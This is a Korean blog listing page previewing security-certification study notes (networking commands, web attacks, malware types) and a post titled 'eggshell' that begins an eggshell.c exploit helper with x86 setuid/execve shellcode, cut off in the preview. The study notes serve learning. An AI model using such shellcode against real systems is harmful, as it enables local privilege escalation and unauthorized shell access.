분류 전체보기229 eggshell 추후 분석 vi eggshell.c #include #include #include #define DEFAULT_OFFSET 0 #define DEFAULT_BUFFER_SIZE 512 #define DEFAULT_EGG_SIZE 2048 #define NOP 0x90 char shellcode[] = "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80" //setuid(geteuid()) "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\.. 2024. 6. 22. 필수기출1200 ~1200 1061. 디렉터리 리스팅 - 보안설정 오류 1062. XML 조회를 위한 질의문 생성시 검증값처리방법 설계 - 공통 검증 컴포넌트 사용 - 필터 컴포넌트 사용 - 개별 코드에서 입력값 필터링 - 안전한 API 사용 1063. HTTP Smuggling - 하나의 패킷 안에 또 하나의 패킷을 포함하여 밀수smuggling 된 패킷을 해석할 경우 공격이 수행된다 1064. WAF: 응용 프로그램이나 서비스의 입출력 및 액세스 제어 방화벽 MDM: 스마트폰, 태블릿 등 모바일 장치를 관리하는 솔루션 기술 IPS: 네트워크 또는 시스템의 악의적 활동 식별, 정보를 기록, 보고, 탐지된 침입 차단 + MAM : 모바일 기기에 설치된 앱과 데이터를 선택적으로 관리하는 솔루션. 개인의 영역과 기업의 영역이 나뉨 1.. 2024. 6. 20. 필수기출1200 ~1060 901. tracert : icmp 패킷 사용 traceroute : udp 패킷 사용 902. 윈도우 명령프롬프트 PC 라우팅 테이블 명령어 : netstat -r + netstat -e : 이더넷 통계 + netstat -an : 모든 연결, 숫자형식 903. netstat -e 인터페이스 통계 예시 받음보냄바이트5515920813890455유니캐스트7000062001비유니캐스트165557115버림00 => 이더넷 통계를 보여준다 904. TCP 정상 연결 4-웨이 핸드셰이크 요청받은쪽 : close_wait 후에 FIN 응답 요청한 쪽 : time_wait 중 FIN이 오면 ACK 905. tcpdump 명령어 win 1234 mss 1460 906. tcpdump -i 2 => 2번 디바이스(인.. 2024. 6. 19. 필수기출1200 ~ 900 711. 보안운영체제 - 시스템에서 일어나는 프로세스 활동을 검사하므로 성능을 고려해서 설치해야 한다 712. 암호 키 보호에 하드웨어를 사용하는 기술 - HSM - 스마트 카드 : 집적회로카드IC에 중앙처리장치를 탑재한 반도체 칩이 매립되어 있다 - TPM : 메인보드내에 설치된 하드웨어 보안칩 + SIM : 개인정보를 저장한 칩 713. 바이러스 - 원시형, 은폐형, 매크로, 암호형, 갑옷형 714. 매크로 바이러스 - 플랫폼과 무관 - 문서 파일의 기능 악용 - 이메일을 통해 감염 715. 웜 - 독립형. 숙주X, 네트워크 시스템의 취약점을 이용해 전파된다 716. 컴파일형 악성코드 : 첫 실행시 실행파일이 만들어지므로 여러차례 실행시 속도가 빨라진다. 실행속도가 빠름 스크립트형 악성코드 : 인터.. 2024. 6. 18. 이전 1 ··· 22 23 24 25 26 27 28 ··· 58 다음
